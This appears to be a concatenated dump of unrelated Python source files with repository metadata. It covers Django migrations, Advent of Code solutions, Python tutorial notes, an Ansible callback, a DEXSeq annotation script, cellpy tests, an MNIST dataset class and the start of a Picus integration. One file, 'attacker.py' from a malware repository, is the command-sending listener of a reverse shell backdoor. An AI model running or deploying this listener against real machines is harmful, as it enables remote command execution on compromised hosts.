('dataset_id', models.CharField(max_length=225, null=True)),
('sample_id', models.CharField(max_length=225, null=True)),
('snorna_expression', models.FloatField(null=True)),
],
),
migrations.CreateModel(
name='snorna_expression_UCS',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('snorna', models.CharField(max_length=225, null=True)),
('dataset_id', models.CharField(max_length=225, null=True)),
('sample_id', models.CharField(max_length=225, null=True)),
('snorna_expression', models.FloatField(null=True)),
],
),
migrations.CreateModel(
name='snorna_expression_UVM',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('snorna', models.CharField(max_length=225, null=True)),
('dataset_id', models.CharField(max_length=225, null=True)),
('sample_id', models.CharField(max_length=225, null=True)),
('snorna_expression', models.FloatField(null=True)),
],
),
]
| 0 | 16,686 | 23 |
99e310433b33672a6a26d25428a9fc76d1e39983 | 1,009 | py | Python | Backdoors/Reverse Shell 1/attacker.py | noamts/Malware | 099577f87abdca76910dcf4f1debc234a9f67c9b | [
"MIT"
] | 47 | 2020-03-19T00:08:21.000Z | 2022-03-31T02:32:16.000Z | Backdoors/Reverse Shell 1/attacker.py | sidwashere/Malware | 1eeb374b1ee992a3dabd00420916dcbd277c66db | [
"MIT"
] | null | null | null | Backdoors/Reverse Shell 1/attacker.py | sidwashere/Malware | 1eeb374b1ee992a3dabd00420916dcbd277c66db | [
"MIT"
] | 14 | 2020-03-18T22:22:15.000Z | 2022-03-29T05:39:25.000Z | import socket
import sys
#creating socket
#Bind socket to port
#Accept connections
main()
| 18.685185 | 45 | 0.700694 | import socket
import sys
#creating socket
def socket_create():
try:
global host,port,s
host=''
port=9999
s=socket.socket()
except socket.error as err:
print("[!]Error in creating Socket!!")
#Bind socket to port
def socket_bind():
try:
global host,port,s
print("[+]Binding Socket to port")
s.bind((host,port))
s.listen(5)
except socket.error as err:
print("[!]Error in Binding Socket")
socket_bind()
#Accept connections
def socket_accept():
connection,address=s.accept()
print("[+]Connection has been established")
print("IP:"+str(address[0]))
print("Port:"+str(address[1]))
send_commands(connection)
connection.close()
def send_commands(connection):
while True:
command=raw_input()
if command=='quit':
connection.close()
s.close()
sys.exit()
if len(str.encode(command))>0:
connection.send(str.encode(command))
client_response=str(connection.recv(1024))
print(client_response)
def main():
socket_create()
socket_bind()
socket_accept()
main()
| 801 | 0 | 112 |
14a959011550c27a8308aa59b02326b9904eb910 | 94 | py | Python | python/overplot/__init__.py | helgemathee/overplot | 9fa9e19132776f6a7b17530c47f0d5158c229a2e | [
"Zlib"
] | null | null | null | python/overplot/__init__.py | helgemathee/overplot | 9fa9e19132776f6a7b17530c47f0d5158c229a2e | [
"Zlib"
] | null | null | null | python/overplot/__init__.py | helgemathee/overplot | 9fa9e19132776f6a7b17530c47f0d5158c229a2e | [
"Zlib"
] | null | null | null | #
# Copyright (c) 2017-2018, Helge Mathee. All rights reserved.
#
OVERPLOT_VERSION = '1.0.0'
| 15.666667 | 61 | 0.691489 | #
# Copyright (c) 2017-2018, Helge Mathee. All rights reserved.
#
OVERPLOT_VERSION = '1.0.0'
| 0 | 0 | 0 |
15acc38819e84ac5b7428ebe8d282589c67064e1 | 504 | py | Python | 01/solution.py | ofloveandhate/advent_of_code_2021 | f44e12596e883e6dd55e2373863627a8331f0d32 | [
"MIT"
] | null | null | null | 01/solution.py | ofloveandhate/advent_of_code_2021 | f44e12596e883e6dd55e2373863627a8331f0d32 | [
"MIT"
] | null | null | null | 01/solution.py | ofloveandhate/advent_of_code_2021 | f44e12596e883e6dd55e2373863627a8331f0d32 | [
"MIT"
] | null | null | null |
###
import numpy as np
###
print("part 1: {}".format(part1()))
print("part 2: {}".format(part2()))
| 15.272727 | 48 | 0.56746 | def read_data():
with open ('input.txt') as f:
data = f.readlines()
return np.array([int(d.strip()) for d in data])
def write_data(data):
with open('output.txt','w') as f:
for d in data:
f.write(str(d)+'\n')
###
import numpy as np
def part1():
data = read_data()
return sum( (data[1:] - data[:-1])>0 )
###
def part2():
data = read_data()
q = data[:-2]+data[1:-1]+data[2:]
return sum( (q[1:] - q[:-1] )>0)
print("part 1: {}".format(part1()))
print("part 2: {}".format(part2()))
| 307 | 0 | 91 |
e74782617027cb7fb595cbabcf9395bba24b1c84 | 3,717 | py | Python | the_basics/basics2.py | XinyanLi23/python_basics | d17b0c8e66a251d155be3b3fbde16fb85a21b65a | [
"MIT"
] | null | null | null | the_basics/basics2.py | XinyanLi23/python_basics | d17b0c8e66a251d155be3b3fbde16fb85a21b65a | [
"MIT"
] | null | null | null | the_basics/basics2.py | XinyanLi23/python_basics | d17b0c8e66a251d155be3b3fbde16fb85a21b65a | [
"MIT"
] | null | null | null |
# $ content split
# * title
# tm terminal
# td treads
# n note
# ! important
# alternative
#$ section 5 create functions
#* return
print(mean([1, 4, 6]))
#print(type(mean),type(sum))
#* print
mymean = mean([0, 3, 4])
print(mymean + 10)
#* conditional
#student_grade = {"Marry": 9.1, "Sim": 8.8, "John": 7.5} #n does not work
#print(mean(student_grade))
#* set for conditional
monday_temperatures = [8.8, 9.1, 9.9]
print(mean(monday_temperatures))
student_grade = {"Marry": 9.1, "Sim": 8.8, "John": 7.5}
print(mean(student_grade))
# ex.
print(foo("mypass"))
#* elif
x = 3
y = 1
if x > y:
print("x is greater than y")
elif x == y:
print("x is equal than y")
else:
print("x is less than y")
#* white space (one or more)
if 3 > 1: #n always one white space between operators
print('b') #n indentation (4 white spaces)
# ex.
#$ section 6 create functions
#* user input
#print(weather_condition(7))
user_input = float(input("Enter temperature:")) #n prompting the user to enter a value
print(weather_condition(user_input)) #td "input" function freezes the execution of a program and waits for the user input one the command line
#user_input = input("Enter some input:") #n use "input" only will get a string, so need to add "float" or "int" before
#print(type(user_input), user_input) #n help to check the type
#* string formatting
user_input = input("Enter your name: ")
message = "Hello %s!" % user_input #td "%s" is a special string, use "%" instead of "," and then the value of variable will replace the %s
#message = f"Hello {user_input}" #n only used after python3.6
#* with multiple variables
name = input("Enter your name: ")
surname = input("Enter your surname: ")
when = "today"
message = "Hello %s %s" % (name, surname) #td need more "%s" for more strings to input
message = f"Hello {name} {surname}, what's up {when}" #n as same as line above
print(message)
#def A(): #n use for only run the block A
#if __name__ == '__main__':
#A()
#ex. | 26.176056 | 201 | 0.586494 |
# $ content split
# * title
# tm terminal
# td treads
# n note
# ! important
# alternative
#$ section 5 create functions
#* return
def mean(mylist):
the_mean = sum(mylist) / len(mylist)
return the_mean #n return "None" if no return
#td it runs halfway with "print(the_mean)". Since after printing the results, it still looks for the return, and shows "None" if there no return afterwards.
print(mean([1, 4, 6]))
#print(type(mean),type(sum))
#* print
def mean(mylist):
print("Function started!") #n we can still use print for information
the_mean = sum(mylist) / len(mylist)
return the_mean #$ ALWAYS use RETURN in functions
mymean = mean([0, 3, 4])
print(mymean + 10)
#* conditional
def mean(mylist): #n only used for list, not for dictionary
the_mean = sum(mylist) / len(mylist)
return the_mean
#student_grade = {"Marry": 9.1, "Sim": 8.8, "John": 7.5} #n does not work
#print(mean(student_grade))
#* set for conditional
def mean(value):
#if type(value) == dict: #* if true = isinstance
if isinstance(value, dict): #td ex."type(3) == int" = "isinstance(3, int)"
the_mean = sum(value.values()) / len(value)
else:
the_mean = sum(value) / len(value)
return the_mean
monday_temperatures = [8.8, 9.1, 9.9]
print(mean(monday_temperatures))
student_grade = {"Marry": 9.1, "Sim": 8.8, "John": 7.5}
print(mean(student_grade))
# ex.
def foo(string):
if len(string) < 8:
return False
else:
return True
print(foo("mypass"))
#* elif
x = 3
y = 1
if x > y:
print("x is greater than y")
elif x == y:
print("x is equal than y")
else:
print("x is less than y")
#* white space (one or more)
if 3 > 1: #n always one white space between operators
print('b') #n indentation (4 white spaces)
# ex.
def foo(temperature):
if temperature > 25:
return "Hot"
elif temperature > 15 & temperature < 25:
return "Warm"
else:
return "Cold"
#$ section 6 create functions
#* user input
def weather_condition(temperature):
if temperature > 7:
return "Warm"
else:
return "Cold"
#print(weather_condition(7))
user_input = float(input("Enter temperature:")) #n prompting the user to enter a value
print(weather_condition(user_input)) #td "input" function freezes the execution of a program and waits for the user input one the command line
#user_input = input("Enter some input:") #n use "input" only will get a string, so need to add "float" or "int" before
#print(type(user_input), user_input) #n help to check the type
#* string formatting
user_input = input("Enter your name: ")
message = "Hello %s!" % user_input #td "%s" is a special string, use "%" instead of "," and then the value of variable will replace the %s
#message = f"Hello {user_input}" #n only used after python3.6
#* with multiple variables
name = input("Enter your name: ")
surname = input("Enter your surname: ")
when = "today"
message = "Hello %s %s" % (name, surname) #td need more "%s" for more strings to input
message = f"Hello {name} {surname}, what's up {when}" #n as same as line above
print(message)
#def A(): #n use for only run the block A
#if __name__ == '__main__':
#A()
#ex.
def foo(name):
message = "Hi %s" % (name.capitalize()) #n uppercase
return message | 1,363 | 0 | 177 |
2d996d3aa0ae4ee0ac34aa0ebe3eb67f22521b77 | 815 | py | Python | blog/apps/upload/migrations/0001_initial.py | panchaoco/blog-py | ae4c66080c40024d5bef463c2827c5bf71881786 | [
"Apache-2.0"
] | null | null | null | blog/apps/upload/migrations/0001_initial.py | panchaoco/blog-py | ae4c66080c40024d5bef463c2827c5bf71881786 | [
"Apache-2.0"
] | 6 | 2021-03-18T23:09:11.000Z | 2022-03-11T23:43:20.000Z | blog/apps/upload/migrations/0001_initial.py | panchaoco/blog-py | ae4c66080c40024d5bef463c2827c5bf71881786 | [
"Apache-2.0"
] | null | null | null | # Generated by Django 2.1.4 on 2019-03-24 19:19
import datetime
from django.db import migrations, models
import upload.storage
| 28.103448 | 122 | 0.585276 | # Generated by Django 2.1.4 on 2019-03-24 19:19
import datetime
from django.db import migrations, models
import upload.storage
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Upload',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('image', models.ImageField(max_length=500, storage=upload.storage.ImageStorage(), upload_to='article/')),
('add_time', models.DateTimeField(default=datetime.datetime.now, verbose_name='上传时间')),
],
options={
'verbose_name': '图片上传',
'verbose_name_plural': '图片上传',
},
),
]
| 0 | 687 | 23 |
4d837e46adcefa5f52c49a2400da2ce8837380d9 | 2,182 | py | Python | ansible/venv/lib/python2.7/site-packages/ansible/plugins/callback/actionable.py | gvashchenkolineate/gvashchenkolineate_infra_trytravis | 0fb18850afe0d8609693ba4b23f29c7cda17d97f | [
"MIT"
] | 17 | 2017-06-07T23:15:01.000Z | 2021-08-30T14:32:36.000Z | ansible/ansible/plugins/callback/actionable.py | SergeyCherepanov/ansible | 875711cd2fd6b783c812241c2ed7a954bf6f670f | [
"MIT"
] | 9 | 2017-06-25T03:31:52.000Z | 2021-05-17T23:43:12.000Z | ansible/ansible/plugins/callback/actionable.py | SergeyCherepanov/ansible | 875711cd2fd6b783c812241c2ed7a954bf6f670f | [
"MIT"
] | 3 | 2018-05-26T21:31:22.000Z | 2019-09-28T17:00:45.000Z | # (c) 2015, Andrew Gaffney <andrew@agaffney.org>
# (c) 2017 Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
DOCUMENTATION = '''
callback: actionable
type: stdout
short_description: shows only items that need attention
description:
- Use this callback when you dont care about OK nor Skipped.
- This callback suppresses any non Failed or Changed status.
version_added: "2.1"
deprecated:
why: The 'default' callback plugin now supports this functionality
removed_in: '2.11'
alternative: "'default' callback plugin with 'display_skipped_hosts = no' and 'display_ok_hosts = no' options"
extends_documentation_fragment:
- default_callback
requirements:
- set as stdout callback in configuration
# Override defaults from 'default' callback plugin
options:
display_skipped_hosts:
name: Show skipped hosts
description: "Toggle to control displaying skipped task/host results in a task"
type: bool
default: no
env:
- name: DISPLAY_SKIPPED_HOSTS
deprecated:
why: environment variables without "ANSIBLE_" prefix are deprecated
version: "2.12"
alternatives: the "ANSIBLE_DISPLAY_SKIPPED_HOSTS" environment variable
- name: ANSIBLE_DISPLAY_SKIPPED_HOSTS
ini:
- key: display_skipped_hosts
section: defaults
display_ok_hosts:
name: Show 'ok' hosts
description: "Toggle to control displaying 'ok' task/host results in a task"
type: bool
default: no
env:
- name: ANSIBLE_DISPLAY_OK_HOSTS
ini:
- key: display_ok_hosts
section: defaults
version_added: '2.7'
'''
from ansible.plugins.callback.default import CallbackModule as CallbackModule_default
| 34.634921 | 118 | 0.674152 | # (c) 2015, Andrew Gaffney <andrew@agaffney.org>
# (c) 2017 Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
DOCUMENTATION = '''
callback: actionable
type: stdout
short_description: shows only items that need attention
description:
- Use this callback when you dont care about OK nor Skipped.
- This callback suppresses any non Failed or Changed status.
version_added: "2.1"
deprecated:
why: The 'default' callback plugin now supports this functionality
removed_in: '2.11'
alternative: "'default' callback plugin with 'display_skipped_hosts = no' and 'display_ok_hosts = no' options"
extends_documentation_fragment:
- default_callback
requirements:
- set as stdout callback in configuration
# Override defaults from 'default' callback plugin
options:
display_skipped_hosts:
name: Show skipped hosts
description: "Toggle to control displaying skipped task/host results in a task"
type: bool
default: no
env:
- name: DISPLAY_SKIPPED_HOSTS
deprecated:
why: environment variables without "ANSIBLE_" prefix are deprecated
version: "2.12"
alternatives: the "ANSIBLE_DISPLAY_SKIPPED_HOSTS" environment variable
- name: ANSIBLE_DISPLAY_SKIPPED_HOSTS
ini:
- key: display_skipped_hosts
section: defaults
display_ok_hosts:
name: Show 'ok' hosts
description: "Toggle to control displaying 'ok' task/host results in a task"
type: bool
default: no
env:
- name: ANSIBLE_DISPLAY_OK_HOSTS
ini:
- key: display_ok_hosts
section: defaults
version_added: '2.7'
'''
from ansible.plugins.callback.default import CallbackModule as CallbackModule_default
class CallbackModule(CallbackModule_default):
CALLBACK_VERSION = 2.0
CALLBACK_TYPE = 'stdout'
CALLBACK_NAME = 'actionable'
| 0 | 114 | 23 |
0aa31a3809f0b3f434e74c5cefb933c844d85844 | 6,125 | py | Python | scripts/dexseq_prepare_annotation.py | dekkerlab/chimera-tie | ff9e1fe090ac9356b37e552457fdc868b659d6b2 | [
"Apache-2.0"
] | null | null | null | scripts/dexseq_prepare_annotation.py | dekkerlab/chimera-tie | ff9e1fe090ac9356b37e552457fdc868b659d6b2 | [
"Apache-2.0"
] | 1 | 2018-09-07T16:35:24.000Z | 2018-10-06T13:02:31.000Z | scripts/dexseq_prepare_annotation.py | dekkerlab/chimera-tie | ff9e1fe090ac9356b37e552457fdc868b659d6b2 | [
"Apache-2.0"
] | null | null | null | import sys, collections, itertools, os.path, optparse
optParser = optparse.OptionParser(
usage = "python %prog [options] <in.gtf> <out.gff>",
description=
"Script to prepare annotation for DEXSeq." +
"This script takes an annotation file in Ensembl GTF format" +
"and outputs a 'flattened' annotation file suitable for use " +
"with the count_in_exons.py script ",
epilog =
"Written by Simon Anders (sanders@fs.tum.de), European Molecular Biology " +
"Laboratory (EMBL). (c) 2010. Released under the terms of the GNU General " +
"Public License v3. Part of the 'DEXSeq' package." )
optParser.add_option( "-r", "--aggregate", type="choice", dest="aggregate",
choices = ( "no", "yes" ), default = "yes",
help = "'yes' or 'no'. Indicates whether two or more genes sharing an exon should be merged into an 'aggregate gene'. If 'no', the exons that can not be assiged to a single gene are ignored." )
(opts, args) = optParser.parse_args()
if len( args ) != 2:
sys.stderr.write( "Script to prepare annotation for DEXSeq.\n\n" )
sys.stderr.write( "Usage: python %s <in.gtf> <out.gff>\n\n" % os.path.basename(sys.argv[0]) )
sys.stderr.write( "This script takes an annotation file in Ensembl GTF format\n" )
sys.stderr.write( "and outputs a 'flattened' annotation file suitable for use\n" )
sys.stderr.write( "with the count_in_exons.py script.\n" )
sys.exit(1)
try:
import HTSeq
except ImportError:
sys.stderr.write( "Could not import HTSeq. Please install the HTSeq Python framework\n" )
sys.stderr.write( "available from http://www-huber.embl.de/users/anders/HTSeq\n" )
sys.exit(1)
gtf_file = args[0]
out_file = args[1]
aggregateGenes = opts.aggregate == "yes"
# Step 1: Store all exons with their gene and transcript ID
# in a GenomicArrayOfSets
exons = HTSeq.GenomicArrayOfSets( "auto", stranded=True )
for f in HTSeq.GFF_Reader( gtf_file ):
if f.type != "exon":
continue
f.attr['gene_id'] = f.attr['gene_id'].replace( ":", "_" )
exons[f.iv] += ( f.attr['gene_id'], f.attr['transcript_id'] )
# Step 2: Form sets of overlapping genes
# We produce the dict 'gene_sets', whose values are sets of gene IDs. Each set
# contains IDs of genes that overlap, i.e., share bases (on the same strand).
# The keys of 'gene_sets' are the IDs of all genes, and each key refers to
# the set that contains the gene.
# Each gene set forms an 'aggregate gene'.
if aggregateGenes == True:
gene_sets = collections.defaultdict( lambda: set() )
for iv, s in exons.steps():
# For each step, make a set, 'full_set' of all the gene IDs occuring
# in the present step, and also add all those gene IDs, whch have been
# seen earlier to co-occur with each of the currently present gene IDs.
full_set = set()
for gene_id, transcript_id in s:
full_set.add( gene_id )
full_set |= gene_sets[ gene_id ]
# Make sure that all genes that are now in full_set get associated
# with full_set, i.e., get to know about their new partners
for gene_id in full_set:
assert gene_sets[ gene_id ] <= full_set
gene_sets[ gene_id ] = full_set
# Step 3: Go through the steps again to get the exonic sections. Each step
# becomes an 'exonic part'. The exonic part is associated with an
# aggregate gene, i.e., a gene set as determined in the previous step,
# and a transcript set, containing all transcripts that occur in the step.
# The results are stored in the dict 'aggregates', which contains, for each
# aggregate ID, a list of all its exonic_part features.
aggregates = collections.defaultdict( lambda: list() )
for iv, s in exons.steps( ):
# Skip empty steps
if len(s) == 0:
continue
gene_id = list(s)[0][0]
## if aggregateGenes=FALSE, ignore the exons associated to more than one gene ID
if aggregateGenes == False:
check_set = set()
for geneID, transcript_id in s:
check_set.add( geneID )
if( len( check_set ) > 1 ):
continue
else:
aggregate_id = gene_id
# Take one of the gene IDs, find the others via gene sets, and
# form the aggregate ID from all of them
else:
assert set( gene_id for gene_id, transcript_id in s ) <= gene_sets[ gene_id ]
aggregate_id = '+'.join( gene_sets[ gene_id ] )
# Make the feature and store it in 'aggregates'
f = HTSeq.GenomicFeature( aggregate_id, "exonic_part", iv )
f.source = os.path.basename( sys.argv[0] )
# f.source = "camara"
f.attr = {}
f.attr[ 'gene_id' ] = aggregate_id
transcript_set = set( ( transcript_id for gene_id, transcript_id in s ) )
f.attr[ 'transcripts' ] = '+'.join( transcript_set )
aggregates[ aggregate_id ].append( f )
# Step 4: For each aggregate, number the exonic parts
aggregate_features = []
for l in aggregates.values():
for i in xrange( len(l)-1 ):
assert l[i].name == l[i+1].name, str(l[i+1]) + " has wrong name"
assert l[i].iv.end <= l[i+1].iv.start, str(l[i+1]) + " starts too early"
if l[i].iv.chrom != l[i+1].iv.chrom:
raise ValueError, "Same name found on two chromosomes: %s, %s" % ( str(l[i]), str(l[i+1]) )
if l[i].iv.strand != l[i+1].iv.strand:
raise ValueError, "Same name found on two strands: %s, %s" % ( str(l[i]), str(l[i+1]) )
aggr_feat = HTSeq.GenomicFeature( l[0].name, "aggregate_gene",
HTSeq.GenomicInterval( l[0].iv.chrom, l[0].iv.start,
l[-1].iv.end, l[0].iv.strand ) )
aggr_feat.source = os.path.basename( sys.argv[0] )
aggr_feat.attr = { 'gene_id': aggr_feat.name }
for i in xrange( len(l) ):
l[i].attr['exonic_part_number'] = "%03d" % ( i+1 )
aggregate_features.append( aggr_feat )
# Step 5: Sort the aggregates, then write everything out
aggregate_features.sort( key = lambda f: ( f.iv.chrom, f.iv.start ) )
fout = open( out_file, "w" )
for aggr_feat in aggregate_features:
fout.write( aggr_feat.get_gff_line() )
for f in aggregates[ aggr_feat.name ]:
fout.write( f.get_gff_line() )
fout.close()
| 40.03268 | 196 | 0.659265 | import sys, collections, itertools, os.path, optparse
optParser = optparse.OptionParser(
usage = "python %prog [options] <in.gtf> <out.gff>",
description=
"Script to prepare annotation for DEXSeq." +
"This script takes an annotation file in Ensembl GTF format" +
"and outputs a 'flattened' annotation file suitable for use " +
"with the count_in_exons.py script ",
epilog =
"Written by Simon Anders (sanders@fs.tum.de), European Molecular Biology " +
"Laboratory (EMBL). (c) 2010. Released under the terms of the GNU General " +
"Public License v3. Part of the 'DEXSeq' package." )
optParser.add_option( "-r", "--aggregate", type="choice", dest="aggregate",
choices = ( "no", "yes" ), default = "yes",
help = "'yes' or 'no'. Indicates whether two or more genes sharing an exon should be merged into an 'aggregate gene'. If 'no', the exons that can not be assiged to a single gene are ignored." )
(opts, args) = optParser.parse_args()
if len( args ) != 2:
sys.stderr.write( "Script to prepare annotation for DEXSeq.\n\n" )
sys.stderr.write( "Usage: python %s <in.gtf> <out.gff>\n\n" % os.path.basename(sys.argv[0]) )
sys.stderr.write( "This script takes an annotation file in Ensembl GTF format\n" )
sys.stderr.write( "and outputs a 'flattened' annotation file suitable for use\n" )
sys.stderr.write( "with the count_in_exons.py script.\n" )
sys.exit(1)
try:
import HTSeq
except ImportError:
sys.stderr.write( "Could not import HTSeq. Please install the HTSeq Python framework\n" )
sys.stderr.write( "available from http://www-huber.embl.de/users/anders/HTSeq\n" )
sys.exit(1)
gtf_file = args[0]
out_file = args[1]
aggregateGenes = opts.aggregate == "yes"
# Step 1: Store all exons with their gene and transcript ID
# in a GenomicArrayOfSets
exons = HTSeq.GenomicArrayOfSets( "auto", stranded=True )
for f in HTSeq.GFF_Reader( gtf_file ):
if f.type != "exon":
continue
f.attr['gene_id'] = f.attr['gene_id'].replace( ":", "_" )
exons[f.iv] += ( f.attr['gene_id'], f.attr['transcript_id'] )
# Step 2: Form sets of overlapping genes
# We produce the dict 'gene_sets', whose values are sets of gene IDs. Each set
# contains IDs of genes that overlap, i.e., share bases (on the same strand).
# The keys of 'gene_sets' are the IDs of all genes, and each key refers to
# the set that contains the gene.
# Each gene set forms an 'aggregate gene'.
if aggregateGenes == True:
gene_sets = collections.defaultdict( lambda: set() )
for iv, s in exons.steps():
# For each step, make a set, 'full_set' of all the gene IDs occuring
# in the present step, and also add all those gene IDs, whch have been
# seen earlier to co-occur with each of the currently present gene IDs.
full_set = set()
for gene_id, transcript_id in s:
full_set.add( gene_id )
full_set |= gene_sets[ gene_id ]
# Make sure that all genes that are now in full_set get associated
# with full_set, i.e., get to know about their new partners
for gene_id in full_set:
assert gene_sets[ gene_id ] <= full_set
gene_sets[ gene_id ] = full_set
# Step 3: Go through the steps again to get the exonic sections. Each step
# becomes an 'exonic part'. The exonic part is associated with an
# aggregate gene, i.e., a gene set as determined in the previous step,
# and a transcript set, containing all transcripts that occur in the step.
# The results are stored in the dict 'aggregates', which contains, for each
# aggregate ID, a list of all its exonic_part features.
aggregates = collections.defaultdict( lambda: list() )
for iv, s in exons.steps( ):
# Skip empty steps
if len(s) == 0:
continue
gene_id = list(s)[0][0]
## if aggregateGenes=FALSE, ignore the exons associated to more than one gene ID
if aggregateGenes == False:
check_set = set()
for geneID, transcript_id in s:
check_set.add( geneID )
if( len( check_set ) > 1 ):
continue
else:
aggregate_id = gene_id
# Take one of the gene IDs, find the others via gene sets, and
# form the aggregate ID from all of them
else:
assert set( gene_id for gene_id, transcript_id in s ) <= gene_sets[ gene_id ]
aggregate_id = '+'.join( gene_sets[ gene_id ] )
# Make the feature and store it in 'aggregates'
f = HTSeq.GenomicFeature( aggregate_id, "exonic_part", iv )
f.source = os.path.basename( sys.argv[0] )
# f.source = "camara"
f.attr = {}
f.attr[ 'gene_id' ] = aggregate_id
transcript_set = set( ( transcript_id for gene_id, transcript_id in s ) )
f.attr[ 'transcripts' ] = '+'.join( transcript_set )
aggregates[ aggregate_id ].append( f )
# Step 4: For each aggregate, number the exonic parts
aggregate_features = []
for l in aggregates.values():
for i in xrange( len(l)-1 ):
assert l[i].name == l[i+1].name, str(l[i+1]) + " has wrong name"
assert l[i].iv.end <= l[i+1].iv.start, str(l[i+1]) + " starts too early"
if l[i].iv.chrom != l[i+1].iv.chrom:
raise ValueError, "Same name found on two chromosomes: %s, %s" % ( str(l[i]), str(l[i+1]) )
if l[i].iv.strand != l[i+1].iv.strand:
raise ValueError, "Same name found on two strands: %s, %s" % ( str(l[i]), str(l[i+1]) )
aggr_feat = HTSeq.GenomicFeature( l[0].name, "aggregate_gene",
HTSeq.GenomicInterval( l[0].iv.chrom, l[0].iv.start,
l[-1].iv.end, l[0].iv.strand ) )
aggr_feat.source = os.path.basename( sys.argv[0] )
aggr_feat.attr = { 'gene_id': aggr_feat.name }
for i in xrange( len(l) ):
l[i].attr['exonic_part_number'] = "%03d" % ( i+1 )
aggregate_features.append( aggr_feat )
# Step 5: Sort the aggregates, then write everything out
aggregate_features.sort( key = lambda f: ( f.iv.chrom, f.iv.start ) )
fout = open( out_file, "w" )
for aggr_feat in aggregate_features:
fout.write( aggr_feat.get_gff_line() )
for f in aggregates[ aggr_feat.name ]:
fout.write( f.get_gff_line() )
fout.close()
| 0 | 0 | 0 |
27ecd7e0de97aba995ab11f8a9a66fb7b971baaa | 1,113 | py | Python | tests/test_cellpy_splitting.py | streamengineer/cellpy | 59a83065297ce0ba370fc11181085c98f587101e | [
"MIT"
] | 38 | 2016-08-16T10:54:56.000Z | 2022-03-03T04:43:20.000Z | tests/test_cellpy_splitting.py | Ozzstein/cellpy | ee532905741db4cb928303d75426d2a4fa77144a | [
"MIT"
] | 88 | 2016-08-16T13:10:27.000Z | 2022-03-29T10:36:39.000Z | tests/test_cellpy_splitting.py | Ozzstein/cellpy | ee532905741db4cb928303d75426d2a4fa77144a | [
"MIT"
] | 13 | 2019-01-02T03:57:52.000Z | 2022-01-19T08:06:49.000Z | import pytest
import logging
import pandas as pd
from cellpy import log
from cellpy.utils import helpers
from . import fdv
from cellpy.exceptions import NullData
log.setup_logging(default_level=logging.DEBUG)
@pytest.fixture
| 24.733333 | 65 | 0.734951 | import pytest
import logging
import pandas as pd
from cellpy import log
from cellpy.utils import helpers
from . import fdv
from cellpy.exceptions import NullData
log.setup_logging(default_level=logging.DEBUG)
@pytest.fixture
def cell():
from cellpy import cellreader
d = cellreader.CellpyData()
d.load(fdv.cellpy_file_path)
return d
def test_split(cell):
list_of_all_cycles = cell.get_cycle_numbers()
c1, c2 = cell.split(10)
list_of_first_cycles = c1.get_cycle_numbers()
list_of_last_cycles = c2.get_cycle_numbers()
assert list_of_first_cycles[0] == 1
assert list_of_first_cycles[-1] == 9
assert list_of_all_cycles[-1] == list_of_last_cycles[-1]
def test_drop_to(cell):
c1 = cell.drop_to(10)
list_of_new_cycles = c1.get_cycle_numbers()
print(list_of_new_cycles)
assert list_of_new_cycles[0] == 10
assert list_of_new_cycles[-1] == cell.get_cycle_numbers()[-1]
def test_drop_from(cell):
c1 = cell.drop_from(10)
list_of_new_cycles = c1.get_cycle_numbers()
assert list_of_new_cycles[0] == 1
assert list_of_new_cycles[-1] == 9
| 790 | 0 | 91 |
3e870086f0ff1e47525d5374a87b55c8fe35f165 | 999 | py | Python | tensorclan/dataset/zoo/mnist_dataset.py | extensive-vision-ai/TheTensorClan | 54b50fcb8f309909478547f37f171d022a838167 | [
"MIT"
] | null | null | null | tensorclan/dataset/zoo/mnist_dataset.py | extensive-vision-ai/TheTensorClan | 54b50fcb8f309909478547f37f171d022a838167 | [
"MIT"
] | 11 | 2020-07-31T02:26:29.000Z | 2022-02-08T18:59:59.000Z | tensorclan/dataset/zoo/mnist_dataset.py | extensive-vision-ai/TheTensorClan | 54b50fcb8f309909478547f37f171d022a838167 | [
"MIT"
] | 1 | 2020-11-24T17:02:54.000Z | 2020-11-24T17:02:54.000Z | from tensorclan.dataset import BaseDataset
from tensorclan.dataset.transform import BaseTransform
from torchvision import datasets
from torch.utils.data import Subset
| 26.289474 | 117 | 0.656657 | from tensorclan.dataset import BaseDataset
from tensorclan.dataset.transform import BaseTransform
from torchvision import datasets
from torch.utils.data import Subset
class MNIST(BaseDataset):
test_set: datasets.MNIST
train_set: datasets.MNIST
def __init__(self, root: str, transforms=None):
self.data_dir = root
self.transforms = transforms
@staticmethod
def split_dataset(dataset, transforms):
train_set = datasets.MNIST(
dataset.data_dir,
train=True,
download=True,
transform=transforms.build_transforms(train=True),
)
test_set = datasets.MNIST(
dataset.data_dir,
train=False,
download=True,
transform=transforms.build_transforms(train=False)
)
return Subset(train_set, indices=range(0, len(train_set))), Subset(test_set, indices=range(0, len(test_set)))
@staticmethod
def plot_sample(sample):
pass
| 626 | 180 | 23 |
3f6b57622ccefb99cae3443a0c6e9eecfad38404 | 25,822 | py | Python | Packs/PicusAutomation/Integrations/Picus/Picus.py | diCagri/content | c532c50b213e6dddb8ae6a378d6d09198e08fc9f | [
"MIT"
] | 799 | 2016-08-02T06:43:14.000Z | 2022-03-31T11:10:11.000Z | Packs/PicusAutomation/Integrations/Picus/Picus.py | diCagri/content | c532c50b213e6dddb8ae6a378d6d09198e08fc9f | [
"MIT"
] | 9,317 | 2016-08-07T19:00:51.000Z | 2022-03-31T21:56:04.000Z | Packs/PicusAutomation/Integrations/Picus/Picus.py | diCagri/content | c532c50b213e6dddb8ae6a378d6d09198e08fc9f | [
"MIT"
] | 1,297 | 2016-08-04T13:59:00.000Z | 2022-03-31T23:43:06.000Z | import demistomock as demisto
from CommonServerPython import *
from CommonServerUserPython import *
import requests
import json
import traceback
from datetime import datetime, timedelta
import time
# Disable insecure warnings
requests.packages.urllib3.disable_warnings() # pylint: disable=no-member
# flake8: noqa
''' CONSTANTS '''
DATE_FORMAT = '%Y-%m-%dT%H:%M:%SZ' # ISO8601 format with UTC, default in XSOAR
VALID_VARIANTS = ["HTTP","HTTPS"]
verify_certificate = not demisto.params().get('insecure', False)
